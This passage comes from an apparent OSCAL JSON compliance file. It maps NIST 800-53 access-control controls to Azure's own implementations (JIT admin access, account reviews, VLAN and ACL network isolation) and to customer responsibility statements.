_x000D_"}],"responsibilities":[{"uuid":"bcd46c63-3f67-42a5-86c1-e14ae8a5ef2d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-025"}],"description":"The customer is responsible for implementing an automated audit and notification system for the lifecycle of managing customer-controlled accounts.","provided-uuid":"15b30bb1-274d-42f8-afc5-aab2a72d3c4a"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"44dc34da-41e7-4b0b-a736-f1327751c77a","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-2.5","statements":[{"uuid":"c9183545-15f0-4e32-9693-a44bcc5811e2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-026"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-2.5_smt","by-components":[{"uuid":"d8e97426-3f45-4e00-ae14-ae7815630b98","export":{"provided":[{"uuid":"fc24a4db-1e13-413a-b71e-a6ffd5a8e27a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-026"}],"description":"Azure requires that all personnel log out at the end of their work period, in advance of any expected unattended inactivity exceeding fifteen (15) minutes, or when they have completed the task that was the purpose of the login, including at the end of their workday. Additionally, when a user has elevated to administrative access using the JIT process, that user's connections are automatically terminated upon expiration of the elevation._x000D_ _x000D_"}],"responsibilities":[{"uuid":"583e221e-4af4-49e0-b5d1-c9f43af92b8d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-026"}],"description":"The customer is responsible for defining and enforcing an inactivity log out policy.","provided-uuid":"fc24a4db-1e13-413a-b71e-a6ffd5a8e27a"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"22fc4666-f481-47b1-ace2-4f9b788a9c93","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-2.7","statements":[{"uuid":"c80df443-8597-4185-98ba-40ddbfce7024","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-027"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-2.7_smt.a","by-components":[{"uuid":"41a96ebf-c733-4509-a018-c22f3169e313","export":{"provided":[{"uuid":"2cfc668c-902e-49fd-9b6c-390f53927713","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-027"}],"description":"Administrative access within Azure uses the JIT process, which grants temporary administrative access through AD security groups, subscription roles, and temporary accounts created with RBAC permissions applied, and emergency access accounts, which utilize AD security groups for administrative access but create Severity 2 alerts when used. Using these methods, Azure personnel establish elevated access in accordance with a role-based access scheme, which organizes information system privileges into roles that are assigned to AD security groups of which users become a member._x000D_ _x000D_ For the persistent accounts that are exceptions to the JIT and emergency access implementations, any group membership action that provides elevated persistent access to Azure is provisioned only after explicit approval by asset owners based on the role of the requestor. This access restriction is strictly enforced via security groups, where security group owners determine approval to be added to a security group based on business justification and role of a user._x000D_ _x000D_"}],"responsibilities":[{"uuid":"9225d923-f9d0-4beb-831c-c49e2b8a6c78","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-027"}],"description":"The customer is responsible for administering privileged user accounts using a role-based access scheme (for customer-controlled accounts). Microsoft considers all customer users to be non-privileged for the purposes of Azure system operations. **Customer Identity Federation** Federal user entities are responsible for enforcing RBAC within their own Active Directory infrastructure and monitoring those role assignments to meet internal requirements.","provided-uuid":"2cfc668c-902e-49fd-9b6c-390f53927713"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"109f3af3-1784-4561-a325-89bbf8689557","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-028"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-2.7_smt.b","by-components":[{"uuid":"b96bfc14-e266-4c8b-8b6e-ec4cbc2afe80","export":{"provided":[{"uuid":"76c4ce5f-0caf-495b-83db-ab6986dd9090","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-028"}],"description":"Access requests to all AD security groups are tracked and managed through the automated workflow management of OneIdentityand MyAccess. These tools track the process of security group access request, approval, creation, modification, and deletion for Azure roles._x000D_ _x000D_ All Azure production accounts are tracked and monitored using the automated account management tools including OneIdentity, MyAccess, and JIT, audit event collection and reporting, and administrative access audit reviews. Accounts are granted access to production system based on roles defined to limit the access to the systems and privileges needed for the administrator to complete their job._x000D_ _x000D_ Azure tracks and monitors elevated role assignments through the access approval as needed for JIT, upon execution for emergency access accounts, and when requested as an exception to JIT and emergency access for persistent access. Azure also executes a quarterly review for all accounts, disabling those identified as unnecessary._x000D_ _x000D_"}],"responsibilities":[{"uuid":"fc778e53-4683-4b48-8afb-6308f34ce2b1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-028"}],"description":"The customer is responsible for monitoring privileged roles of customer-controlled accounts.","provided-uuid":"76c4ce5f-0caf-495b-83db-ab6986dd9090"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"602e5d31-8b66-493c-ba2c-5d56a38eb20a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-029"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-2.7_smt.c","by-components":[{"uuid":"3b4a206b-6685-42c0-a120-cb382c466f6e","export":{"provided":[{"uuid":"0e346125-792e-4650-a80f-5a3151fc2e52","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-029"}],"description":"Access requests to all AD security groups are tracked and managed by OneIdentity, MyAccess, and CoreIdentity. These tools track the process of security group access request, approval, creation, modification, and deletion for Azure identities. All Azure production accounts are tracked and monitored using the automated account management tools including OneIdentity, MyAccess, and CoreIdentity and JIT, audit event collection and reporting, and administrative access audit reviews. Accounts are granted access to production system based on roles defined to limit the access to the services and privileges needed for the administrator to complete their job. Azure tracks and monitors elevated role assignments through the access approval as needed for JIT, upon execution for Break-Glass accounts, and when requested as an exception to JIT and Break-Glass for persistent access. Azure also executes a quarterly review for all accounts, disabling those identified as unnecessary."}],"responsibilities":[{"uuid":"0e56c697-2f24-4527-9295-b16c188c7088","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-029"}],"description":"The customer is responsible for monitoring elevated roles of customer-controlled accounts.","provided-uuid":"0e346125-792e-4650-a80f-5a3151fc2e52"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"229e786e-3f29-41d2-805d-ca63cf6bbbd5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-030"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-2.7_smt.d","by-components":[{"uuid":"94ddcd2d-470f-4cc3-ad35-9cd6eb0ae7b7","export":{"provided":[{"uuid":"ff6c3c04-7511-4636-b95f-53f9f6b8516a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-030"}],"description":"Elevated role assignments are no longer appropriate when Azure personnel either no longer need the administrative access to accomplish their task, their allotted JIT time expires, or the personnel are transferred or terminated. In those cases, Azure follows the account management processes to terminate the account or revoke access."}],"responsibilities":[{"uuid":"42da2e9e-a6d0-4530-97bd-e184e3d60ebc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-030"}],"description":"The customer is responsible for acting on customer-controlled accounts when elevated role assignments are no longer appropriate.","provided-uuid":"ff6c3c04-7511-4636-b95f-53f9f6b8516a"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"8074ee7c-1014-4998-b050-3b1497e00674","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-2.9","statements":[{"uuid":"a371c95b-ef9d-4a84-a724-dd9341a519f8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-031"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ac-2.9_smt","by-components":[{"uuid":"ffce8fca-5db7-45a7-b4d8-96bc48be5ba9","export":{"provided":[{"uuid":"ce57edaf-bce7-4477-8452-d1041fa80bc4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-031"}],"description":"Group or shared accounts are not utilized within Azure unless necessary, such as where the local account or accounts cannot be deleted or disabled, or is necessary for emergency access. For accounts tracked as approved exceptions, the credentials for these accounts are stored in an approved secret management store, which tracks and monitors access to secrets and ensures group or shared account usage is uniquely attributable to the user accessing it by associated the secret store logs with the group or shared account usage. When a user accesses the credentials in the secret management store, that user is identified uniquely, ensuring non-repudiation and attributing user activity to the shared account._x000D_ _x000D_"}],"responsibilities":[{"uuid":"ade87b76-78e3-4b6f-a6d9-fe84797f4750","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-031"}],"description":"The customer is responsible for restricting the use of customer-controlled shared/group accounts.","provided-uuid":"ce57edaf-bce7-4477-8452-d1041fa80bc4"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"eac2f68f-5b12-4e17-bfab-7616d6ab39b1","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-2.11","statements":[{"uuid":"e3f1f3e2-6569-4864-924e-dd2cc2ea26ba","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-032"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ac-2.11_smt","by-components":[{"uuid":"fbeb02f1-29d8-4c37-b389-68c0c4ab9cd1","export":{"provided":[{"uuid":"ccc22e4f-3d8d-4c87-bd77-48a060c8e404","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-032"}],"description":"Azure operates twenty-four (24) hours a day, seven (7) days a week, and as such, does not apply usage conditions or restrictions for any Azure accounts._x000D_ _x000D_"}],"responsibilities":[{"uuid":"829efce8-3320-47bf-90d4-4797d8994139","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-032"}],"description":"The customer is responsible for enforcing the appropriate usage of all customer-controlled accounts within the system.","provided-uuid":"ccc22e4f-3d8d-4c87-bd77-48a060c8e404"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"2530c7c0-8083-41a5-bc95-73f9954284d3","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-2.12","statements":[{"uuid":"5cc0c285-bf9a-47e2-bdf3-842df5c134cb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-033"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-2.12_smt.a","by-components":[{"uuid":"ce43738d-010b-4412-8883-9f4541e3be5d","export":{"provided":[{"uuid":"2d634f75-ed95-4802-96bc-ef2362bec0fc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-033"}],"description":"Azure monitors for atypical use by monitoring for the indications of compromise identified in the Incident Management SOP._x000D_ _x000D_"}],"responsibilities":[{"uuid":"f0d038da-5e06-41c3-82f3-974fcf9499d8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-033"}],"description":"The customer is responsible for monitoring customer-controlled accounts for atypical usage.","provided-uuid":"2d634f75-ed95-4802-96bc-ef2362bec0fc"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"2c9ca7d3-2e12-4c90-9507-203c8ae4da49","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-034"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-2.12_smt.b","by-components":[{"uuid":"eeeab4ca-ec69-4fd9-ae47-9bd6ee48f53b","export":{"provided":[{"uuid":"082a6fa1-27fe-4825-9c76-f5a908a2aa07","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-034"}],"description":"Azure follows normal incident reporting procedures if atypical use is detected, including reporting to the Security Response Team and ISSO/ISSM as necessary._x000D_ _x000D_"}],"responsibilities":[{"uuid":"978a1878-c5b8-4856-9eab-45c79c00c557","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-034"}],"description":"The customer is responsible for reporting atypical behavior of customer-controlled accounts.","provided-uuid":"082a6fa1-27fe-4825-9c76-f5a908a2aa07"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"c50e9b19-8be6-42bc-bd8d-5633defaa488","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-2.13","statements":[{"uuid":"1eaf5e04-8fb6-49e8-ad3e-5f53ab5d37c4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-035"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-2.13_smt","by-components":[{"uuid":"5ed0c386-03a8-444c-aabf-96d041fa4504","export":{"provided":[{"uuid":"f04b1767-e63a-4128-b7a2-d03469edc6eb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-035"}],"description":"Active monitoring tools include the Geneva Monitoring Agent (MA), System Center Operations Manager (SCOM), and Kusto. Audit records for each Azure service are captured by the MA and retained in Azure Storage. The MA aggregates monitoring information for review. SCOM provides file integrity validation and protection, as well as the recovery of core system files if any unauthorized changes are detected. Kusto consolidates all available logs._x000D_ _x000D_ These tools are configured to provide near-real-time alerts to service team or Security Response Team personnel in situations that require immediate action. Microsoft documents the indications of compromise or potential compromise in the Incident Management SOP. Azure follows normal incident reporting procedures if atypical usage is detected. Per the new hire orientation process, users that are discovered to pose a significant risk to Microsoft are terminated and their access is revoked from Microsoft networks, including Azure. For involuntary terminations, an urgent request for access termination is submitted via email from HR and access is disabled within four (4) hours._x000D_ _x000D_"}],"responsibilities":[{"uuid":"3636718b-45d2-4de9-ba0e-7cddbc86b33f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-035"}],"description":"The customer is responsible for disabling customer-controlled accounts of users posing a significant risk.","provided-uuid":"f04b1767-e63a-4128-b7a2-d03469edc6eb"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"9a835063-de35-4d8d-99f2-e7529f33bca9","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-3","statements":[{"uuid":"3297bcac-fbb8-4d1a-ba03-8cd7d9a4ce9e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-036"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-3_smt","by-components":[{"uuid":"d39c1231-5266-44e8-9e61-c0c094ba1fa6","export":{"provided":[{"uuid":"8b7bbfbf-51e0-474b-89ec-56516f866de3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-036"}],"description":"Azure enforces approved authorizations for logical access to the Azure environment using role-based access control enforced by Active Directory. Access to Active Directory security groups is managed through OneIdentityand MyAccess. Only screened personnel can access services in the Azure environment._x000D_ _x000D_ All accounts created in support of Azure are role-based. Service team users request access to Azure, and if approved, are placed in the appropriate security groups according to their roles for supporting their services, using the principles of least privilege._x000D_ _x000D_ By default, accounts do not have persistent elevated permissions to the production environment. If an Azure user needs access to the production environment to perform a specific action, they request temporary Just in Time (JIT) access through the JIT portal. Approval is granted either automatically using preconfigured rules or a different Azure user with the access approver role. Access is only provided for a finite period based on the expected duration of the work to be performed. If access is approved, the user is assigned the minimum permissions required to perform the work, and permission is automatically revoked at the end of the specified time._x000D_ _x000D_"}],"responsibilities":[{"uuid":"4cb25c45-50fb-4465-aea7-8be43c810910","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-036"}],"description":"The customer is responsible for enforcing approved authorizations for logical access to customer-deployed resources. Government customers are responsible for enforcing approved authorizations for logical access to the system, in compliance with their organizational policies, using their Active Directory (AD) infrastructure. Government users authenticate to government-owned ADFS servers which utilize the government AD infrastructure to identify, authenticate, and apply permissions to that user's session. The government ADFS server then communicates that identification/authentication and the associated permissions to AAD via SAML2.0 ticket. Once permissions are communicated to AAD, AAD is responsible for enforcing those permissions for the user's O365 MT session. For information regarding how to manage user accounts in Active Directory, see TechNet article #754661: http://technet.microsoft.com/en-us/library/cc754661.aspx.","provided-uuid":"8b7bbfbf-51e0-474b-89ec-56516f866de3"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"e8204cae-c2f6-43f3-acd4-4d3c3110dced","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-4","statements":[{"uuid":"89ffc5ad-456f-4c68-af54-2bd843beceaa","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-037"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-4_smt","by-components":[{"uuid":"c43a3ad2-5d75-4629-a8ff-dbba7bc00ac8","export":{"provided":[{"uuid":"baaaaac0-07c4-4927-a11b-8a6e38ef180c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-037"}],"description":"Azure enforces approved authorizations for controlling the flow of information within the system and between interconnected systems by using the following features and controls._x000D_ _x000D_ VLAN Isolation_x000D_ _x000D_ The Azure environment is logically segregated using software Virtual Local Area Networks (VLANs) to separate customer traffic from the rest of the Azure and Microsoft networks. The Azure environment in any datacenter is logically segregated into three primary VLANs - the Universal Fabric Controller (UFC) VLAN, the Fabric Controller (FC) VLAN, and a main VLAN that houses the rest of the components including the VMs and storage. Customer data sits behind the main VLAN and is segregated from other customer's data. A brief description of each VLAN is below:* UFC VLAN - Used for communication between the UFC and FCs_x000D_ * FC VLAN - Used for communication between FCs and other network devices_x000D_ * Main VLAN - Used for customer VMs and FCs_x000D_ _x000D_ VLANs partition a network such that no communication is possible between VLANs without passing through a router. This prevents a compromised asset from faking traffic from outside its VLAN and from eavesdropping on traffic that is not to or from its VLAN. VLANs and ACLs restrict network communications by source and destination IP addresses, protocols, and port numbers. Communication is permitted from the FC VLAN to the main VLAN but cannot be initiated from the main VLAN to the FC VLAN, protecting the fabric from customers._x000D_ As the central orchestrator of much the Azure infrastructure, significant controls are in place to mitigate threats to FCs, especially from potentially compromised Azure VMs within customer applications. FCs do not recognize any hardware whose device information such as a MAC address is not pre-loaded in the FC. The DHCP servers on the FC have configured lists of MAC addresses of the assets they are willing to boot. Even if unauthorized assets are connected, they are not incorporated into the Fabric inventory. This reduces the risk of unauthorized assets communicating with the FC and gaining access to the VLAN._x000D_ _x000D_ Software Load Balancers_x000D_ _x000D_ Access to the Azure environment from outside the cluster is restricted through Software Load Balancers (SLBs). The SLB is a networking device that accepts internet traffic coming into Azure and forwards it to an appropriate internal IP address and port within the Fabric. In the common case where there are several different machines or VMs that can handle a given request, the SLB allocates the connections in a way that balances the load among them. The SLB routing tables are updated as VMs are created, deleted, and moved from one piece of hardware to another._x000D_ _x000D_ Virtual Filtering Platform (VFP) Filter_x000D_ _x000D_ The Virtual Filtering Platform (VFP) Filter component in the Host OS isolates the Host OS from the Guest VMs and the Guest VMs from one another. It performs filtering of traffic to restrict communication between tenant's assets and the internet based on the customer's service configuration, segregating them from other tenants. The VFP Filter component on the VM allow passage of only those packets called out in the configuration documents of those VMs._x000D_ _x000D_ Customers must explicitly open ports on their role instances by configuring the port number in their Service Definition file. There is no port that is open by default unless explicitly configured by the customer in the service definition. Once configured, the FC automatically updates the network traffic rule sets on VFP Filter as well as on the SLB to allow external traffic only through the designated ports._x000D_ _x000D_ In addition, there is a VFP Filter on each customer VM which the customer is responsible for configuring the range of IP addresses authorized to access the customer environment._x000D_ _x000D_ Firewall_x000D_ _x000D_ For scalability and reliability in a hyperscale environment, Azure does not implement traditional firewall architecture at the perimeter between the external and Azure environments to Azure internal components, but achieves the same effect using a series of firewalls at the OS layer, including a host firewall, hypervisor firewall, and VM firewall. All infrastructure components are assigned IP addresses that are from Dedicated IPs (DIPs) allocated from non-routable address space. Therefore, an attacker on the internet cannot route traffic to those addresses as they do not reach Azure. In the unlikely event the attacker was able to route the traffic to the addresses, the Azure Gateway routers filter all packets addressed to internal addresses so they do not enter the network. The only components that accept traffic directed to Virtual IPs (VIPs) are the Azure software load balancers._x000D_ _x000D_ Access Control Lists (ACLs)_x000D_ _x000D_ Azure only allows connections and communication which are necessary to allow systems to operate, blocking all other ports, protocols and connections by default, as defined in Microsoft's Online Services Network Security Standard. Access Control Lists (ACLs) are the preferred mechanism to restrict network communications by source and destination networks, protocols, and port numbers. Approved mechanisms to implement networked-based ACLs include: tiered ingress ACLs on routers managed by Azure Networking, IPSec policies applied to hosts to restrict communications when used in conjunction with tiered ACLs, network firewall rules, and host-based firewall rules._x000D_ _x000D_ Certain communications as defined in the Firewall Rule and Tiered ACL Guidelines are pre-approved and therefore permitted without requiring further review by online services security. The Firewall Rule and Tiered ACL Guidelines define the ingress and egress ACLs specifying the approved protocols and ports for each key connection point based upon the asset classification of the data. Azure requires all ACLs involving ingress and egress ports other than what is listed within the Firewall Rule and Tiered ACL Guidelines, to obtain approval through the Security Review Process prior to implementation._x000D_ _x000D_ Applications_x000D_ _x000D_ For data flowing between application components, service teams control input by using an input validation method stipulated by Microsoft's Security Development Lifecycle (SDL) process, further detailed in the CM and SA families of controls. Input validation testing includes regulating data inputs by size, formation, and structure prior to allowing information to reach the underlying database. The backend services and servers receive only pre-validated inputs from the front-end webservers. The backend is not directly accessible, from an application data flow perspective, in any other method._x000D_ _x000D_"}],"responsibilities":[{"uuid":"1108d6ab-a7f2-48aa-bd98-4d3759f0d8f9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-037"}],"description":"The customer is responsible for controlling the flow of information within customer-deployed resources and between interconnected systems.","provided-uuid":"baaaaac0-07c4-4927-a11b-8a6e38ef180c"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"e311e3e9-e111-4db3-ae51-33492708961e","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-4.4","statements":[{"uuid":"9acf5797-c9a9-4488-89f9-94177c9bbe22","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-038"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ac-4.4_smt","by-components":[{"uuid":"5ac66944-8302-404c-a210-562b74939a9d","export":{"provided":[{"uuid":"1d71ae9f-653d-4da7-8008-029941515502","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-038"}],"description":"Azure does not monitor or examine customer data by design. The customer is fully responsible for ensuring they can monitor and content-check their encrypted information."}],"responsibilities":[{"uuid":"bd6d686c-43fb-45c1-9fb6-29cb173f7331","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-038"}],"description":"The customer is responsible for preventing encrypted information from bypassing content-checking mechanisms by (one or more): decrypting the information; blocking the flow of the encrypted information; terminating communications sessions attempting to pass encrypted information; organization-defined procedure or method.","provided-uuid":"1d71ae9f-653d-4da7-8008-029941515502"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"a2d755ab-ed25-4103-a67b-b04a17304734","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-4.21","statements":[{"uuid":"a959a3a0-867d-4317-b824-bf206db7561e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-039"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-4.21_smt","by-components":[{"uuid":"18c05bd7-d17e-46d5-ba6c-010d29e30157","export":{"provided":[{"uuid":"72d3e905-efb7-45bf-811e-974c1a68105c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-039"}],"description":"Azure logically separates information flows using ACLs. ACLs are the preferred mechanism to restrict network communications by source and destination networks, protocols, and port numbers. Approved mechanisms to implement networked-based ACLs include: tiered ACLs on routers managed by Azure Networking, IPSec policies applied to hosts to restrict communications when used in conjunction with tiered ACLs, network firewall rules, and host-based firewall rules._x000D_ _x000D_ Additionally, Azure separates all information flows logically using user session encryption. TLS ensures the confidentiality and integrity of each flow; only the intended recipient can decrypt information._x000D_ _x000D_ For data flowing between application components, service teams control input by using an input validation method stipulated by Microsoft's Security Development Lifecycle 